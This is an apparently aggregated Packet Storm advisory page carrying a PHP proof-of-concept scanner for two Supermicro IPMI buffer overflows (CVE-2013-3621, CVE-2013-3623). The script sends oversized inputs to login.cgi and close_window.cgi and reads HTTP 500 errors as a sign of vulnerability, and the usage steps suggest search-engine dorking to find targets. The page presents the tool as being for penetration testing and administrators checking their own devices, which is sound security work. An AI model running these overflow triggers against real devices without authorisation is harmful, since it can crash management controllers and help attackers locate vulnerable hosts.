Supermicro X9 Buffer Overflow Scanner

🗓️ 06 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 623 Views

Supermicro X9 vulnerability scanner detects buffer overflow in IPMI systems for specific CVEs.

Reporter	Title	Published	Views	Family All 20
0day.today	Supermicro Onboard IPMI close_window.cgi Buffer Overflow Vulnerability	17 Nov 201300:00	–	zdt
Circl	CVE-2013-3621	29 May 201815:50	–	circl
Circl	CVE-2013-3623	18 Nov 201300:00	–	circl
Check Point Advisories	Supermicro IPMI Firmware CGI Scanner Remote Code Execution (CVE-2013-3621; CVE-2013-3623)	12 Nov 201300:00	–	checkpoint_advisories
CVE	CVE-2013-3621	2 Jan 202017:51	–	cve
CVE	CVE-2013-3623	10 Dec 201316:00	–	cve
Cvelist	CVE-2013-3621	2 Jan 202017:51	–	cvelist
Cvelist	CVE-2013-3623	10 Dec 201316:00	–	cvelist
Exploit DB	Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)	18 Nov 201300:00	–	exploitdb
Kitploit	Sarenka - OSINT Tool - Data From Services Like Shodan, Censys Etc. In One Place	7 Jan 202111:30	–	kitploit

=============================================================================================================================================
    | # Title     : Supermicro X9 generation motherboards before SMT X9 317 PHP Vulnerability Scanner                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.supermicro.com                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is a Vulnerability Scanner designed to scan for vulnerabilities in the Supermicro Onboard IPMI interface. The code checks for two known vulnerabilities in Supermicro IPMI systems:
    
        CVE-2013-3621 - Buffer Overflow in login.cgi The code sends a normal-sized login, then sends a much larger data.
    
        If the server responds with a 500 (Internal Server Error) when sending the large data, the system is vulnerable.
    
        CVE-2013-3623 - Buffer Overflow in close_window.cgi Sends a request to close_window.cgi using normal data, then sends a very large data.
    
        If the server responds with a 500 when sending the large data, the system is vulnerable.
    
        How does the code work?
    
        Verifies that the target site is a Supermicro IPMI by checking the text on the home page (isSupermicro).
    
        Checks the login.cgi vulnerability by sending random login data (checkLogin).
    
        Checks the close_window.cgi vulnerability by sending session data (checkCloseWindow).
    
        Displays the results: If the target is vulnerable, a warning message will be printed.
    
        What is this code for?
    
        Helps security researchers discover systems vulnerable to these vulnerabilities.
    
        Can be used in penetration testing to verify the security of Supermicro IPMI devices.
    	
        Administrators can use it to verify that their systems are not vulnerable to these vulnerabilities.
    	
    	
    	( Related : https://packetstorm.news/files/id/181154/  Related CVE Numbers: CVE-2013-3621, CVE-2013-3623 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 92
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class SupermicroIPMIScanner {
        private $target;
        
        public function __construct($target) {
            $this->target = $target;
        }
        
        private function sendRequest($uri, $method = 'GET', $postData = []) {
            $url = "http://{$this->target}{$uri}";
            
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            
            if ($method === 'POST') {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
            }
            
            $response = curl_exec($ch);
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            
            return ['body' => $response, 'code' => $httpCode];
        }
        
        private function isSupermicro() {
            $res = $this->sendRequest("/");
            return ($res['code'] === 200 && strpos($res['body'], "ATEN International Co Ltd.") !== false);
        }
        
        private function sendCloseWindowRequest($session) {
            return $this->sendRequest("/cgi/close_window.cgi", 'POST', ['sess_sid' => $session]);
        }
        
        private function checkCloseWindow() {
            $safeCheck = str_repeat('A', 20);
            $triggerCheck = str_repeat('A', 132);
            
            $res = $this->sendCloseWindowRequest($safeCheck);
            if (!$res || $res['code'] !== 200 || strpos($res['body'], "Can't find action") === false) {
                return false;
            }
            
            $res = $this->sendCloseWindowRequest($triggerCheck);
            return ($res && $res['code'] === 500);
        }
        
        private function sendLoginRequest($name) {
            return $this->sendRequest("/cgi/login.cgi", 'POST', [
                'name' => $name,
                'pwd' => str_repeat('A', 4)
            ]);
        }
        
        private function checkLogin() {
            $safeCheck = str_repeat('A', 20);
            $triggerCheck = str_repeat('A', 300);
            
            $res = $this->sendLoginRequest($safeCheck);
            if (!$res || $res['code'] !== 200 || strpos($res['body'], "ATEN International Co Ltd.") === false || strpos($res['body'], "top.location.href = location.href") === false) {
                return false;
            }
            
            $res = $this->sendLoginRequest($triggerCheck);
            return ($res && $res['code'] === 500);
        }
        
        public function runScan() {
            echo "Checking if it's a Supermicro IPMI web interface...\n";
            if ($this->isSupermicro()) {
                echo "Supermicro IPMI web interface found\n";
            } else {
                echo "Supermicro IPMI web interface not found\n";
                return;
            }
            
            echo "Checking CVE-2013-3621 (login.cgi Buffer Overflow)...\n";
            if ($this->checkLogin()) {
                echo "Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)\n";
            }
            
            echo "Checking CVE-2013-3623 (close_window.cgi Buffer Overflow)...\n";
            if ($this->checkCloseWindow()) {
                echo "Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)\n";
            }
        }
    }
    
    $scanner = new SupermicroIPMIScanner('192.168.1.1'); // استبدل بعنوان الهدف
    $scanner->runScan();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

06 Mar 2025 00:00Current

7.7High risk

Vulners AI Score7.7

CVSS 210

EPSS0.8637